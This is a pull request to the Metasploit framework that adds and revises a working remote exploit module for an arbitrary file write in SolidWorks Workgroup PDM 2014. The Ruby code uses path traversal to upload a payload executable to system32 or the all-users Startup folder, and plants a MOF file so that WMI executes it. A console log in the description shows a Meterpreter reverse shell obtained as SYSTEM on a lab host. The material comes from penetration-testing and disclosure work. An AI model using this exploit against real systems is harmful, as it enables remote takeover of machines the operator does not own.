### PR TITLE
Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write

### DIFF
--- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb
+++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb
@@ -39,7 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          ['EDB',   '31831']
+          ['EDB',   '31831'],
+          ['OSVDB', '103671']
         ],
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb
+++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb
@@ -18,16 +18,18 @@ class Metasploit3 < Msf::Exploit::Remote
       info,
       'Name'           => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
       'Description'    => %q{
-        This module exploits an arbitrary file write vulnerability in SolidWorks
-        Workgroup PDM 2014 SP2 and prior.
+        This module exploits a remote arbitrary file write vulnerability in
+        SolidWorks Workgroup PDM 2014 SP2 and prior.
 
-        Code execution can be achieved by first uploading the payload to the remote
-        machine as an exe file, and then upload another mof file, which enables
-        WMI (Management Instrumentation service) to execute the uploaded payload.
-        Please note that this module currently only works for Windows before Vista.
+        For targets running Windows Vista or newer the payload is written to the
+        startup folder for all users and executed upon next user logon.
+
+        For targets before Windows Vista code execution can be achieved by first
+        uploading the payload as an exe file, and then upload another mof file,
+        which schedules WMI to execute the uploaded payload.
 
         This module has been tested successfully on SolidWorks Workgroup PDM
-        2011 SP0.
+        2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -46,15 +48,18 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          # Tested on SolidWorks Workgroup PDM 2011 SP0 - Windows XP SP3 (EN)
-          ['SolidWorks Workgroup PDM <= 2014 SP2 on Windows (Before Vista)', {}]
+          # Tested on:
+          # - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
+          # - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
+          ['Automatic', { 'auto' => true } ], # both
+          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
+          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Feb 22 2014',
       'DefaultTarget'  => 0))
 
     register_options([
-      OptString.new('WINDIR', [true, 'The Windows directory', 'WINDOWS']),
       OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
       Opt::RPORT(30000)
     ], self.class)
@@ -85,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
       vprint_status "#{peer} - Received reply (#{res.length} bytes)"
       Exploit::CheckCode::Detected
     else
-      vprint_error "#{peer} - Unexpected reply (#{res.length} bytes)"
+      vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
       Exploit::CheckCode::Safe
     end
   end
@@ -123,20 +128,22 @@ class Metasploit3 < Msf::Exploit::Remote
   # Exploit
   #
   def exploit
-    windir = datastore['WINDIR']
-    depth  = '..\\' * datastore['DEPTH']
-    # send exe
-    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
+    depth    = '..\\' * datastore['DEPTH']
     exe      = generate_payload_exe
-    print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
-    upload("#{depth}#{windir}\\system32\\#{exe_name}", exe)
-    # send mof
-    mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
-    mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
-    print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
-    upload("#{depth}#{windir}\\system32\\wbem\\mof\\#{mof_name}", mof)
-    # clean up
+    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
+    if target.name =~ /Automatic/ or target.name =~ /Vista/
+      print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
+      upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
+    end
+    if target.name =~ /Automatic/ or target.name =~ /XP/
+      print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
+      upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
+      mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
+      mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+      print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
+      upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+      register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
+    end
     register_file_for_cleanup("#{::File.basename(exe_name)}")
-    register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
   end
 end

--- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_wbem.rb
+++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_wbem.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
+      'Description'    => %q{
+        This module exploits an arbitrary file write vulnerability in SolidWorks
+        Workgroup PDM 2014 SP2 and prior.
+
+        Code execution can be achieved by first uploading the payload to the remote
+        machine as an exe file, and then upload another mof file, which enables
+        WMI (Management Instrumentation service) to execute the uploaded payload.
+        Please note that this module currently only works for Windows before Vista.
+
+        This module has been tested successfully on SolidWorks Workgroup PDM
+        2011 SP0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>',  # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB',   '31831']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Tested on SolidWorks Workgroup PDM 2011 SP0 - Windows XP SP3 (EN)
+          ['SolidWorks Workgroup PDM <= 2014 SP2 on Windows (Before Vista)', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 22 2014',
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('WINDIR', [true, 'The Windows directory', 'WINDOWS']),
+      OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
+      Opt::RPORT(30000)
+    ], self.class)
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  #
+  # Check
+  #
+  def check
+    # op code
+    req  = "\xD0\x07\x00\x00"
+    # filename length
+    req << "\x00\x00\x00\x00"
+    # data length
+    req << "\x00\x00\x00\x00"
+    connect
+    sock.put req
+    res = sock.get_once
+    disconnect
+    if !res
+      vprint_error "#{peer} - Connection failed."
+      Exploit::CheckCode::Unknown
+    elsif res == "\x00\x00\x00\x00"
+      vprint_status "#{peer} - Received reply (#{res.length} bytes)"
+      Exploit::CheckCode::Detected
+    else
+      vprint_error "#{peer} - Unexpected reply (#{res.length} bytes)"
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  #
+  # Send a file
+  #
+  def upload(fname, data)
+    # every character in the filename must be followed by 0x00
+    fname = fname.scan(/./).join("\x00") + "\x00"
+    # op code
+    req  = "\xD0\x07\x00\x00"
+    # filename length
+    req << "#{[fname.length].pack('l')}"
+    # file name
+    req << "#{fname}"
+    # data length
+    req << "#{[data.length].pack('l')}"
+    # data
+    req << "#{data}"
+    connect
+    sock.put req
+    res = sock.get_once
+    disconnect
+    if !res
+      fail_with(Failure::Unknown, "#{peer} - Connection failed.")
+    elsif res == "\x00\x00\x00\x00"
+      print_status "#{peer} - Received reply (#{res.length} bytes)"
+    else
+      print_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
+    end
+  end
+
+  #
+  # Exploit
+  #
+  def exploit
+    windir = datastore['WINDIR']
+    depth  = '..\\' * datastore['DEPTH']
+    # send exe
+    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
+    exe      = generate_payload_exe
+    print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
+    upload("#{depth}#{windir}\\system32\\#{exe_name}", exe)
+    # send mof
+    mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
+    mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+    print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
+    upload("#{depth}#{windir}\\system32\\wbem\\mof\\#{mof_name}", mof)
+    # clean up
+    register_file_for_cleanup("#{::File.basename(exe_name)}")
+    register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
+  end
+end


### PR DESCRIPTION
Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write exploit module.
- Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
- Tested on: SolidWorks Workgroup PDM 2011 SP0 - Windows XP SP3 (EN)

![SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write](https://f.cloud.github.com/assets/434827/2248342/27a330aa-9d78-11e3-831b-5500d51b8ac0.png)

```
msf > use exploit/windows/misc/solidworks_workgroup_pdmwservice_wbem
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set RHOST 192.168.247.134
RHOST => 192.168.247.134
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set VERBOSE true
VERBOSE => true
msf exploit(solidworks_workgroup_pdmwservice_wbem) > check

[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - The target service is running, but could not be validated.
msf exploit(solidworks_workgroup_pdmwservice_wbem) > run

[*] Started reverse handler on 192.168.247.128:4444 
[*] 192.168.247.134:30000 - Sending EXE (73802 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - Sending MOF (2231 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] Sending stage (769024 bytes) to 192.168.247.134
[*] Meterpreter session 1 opened (192.168.247.128:4444 -> 192.168.247.134:1314) at 2014-02-24 11:24:01 -0500
[+] Deleted wbem\mof\good\KocTtKc.mof
[!] This exploit may require manual cleanup of: WnwxXUjKQYGyh.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
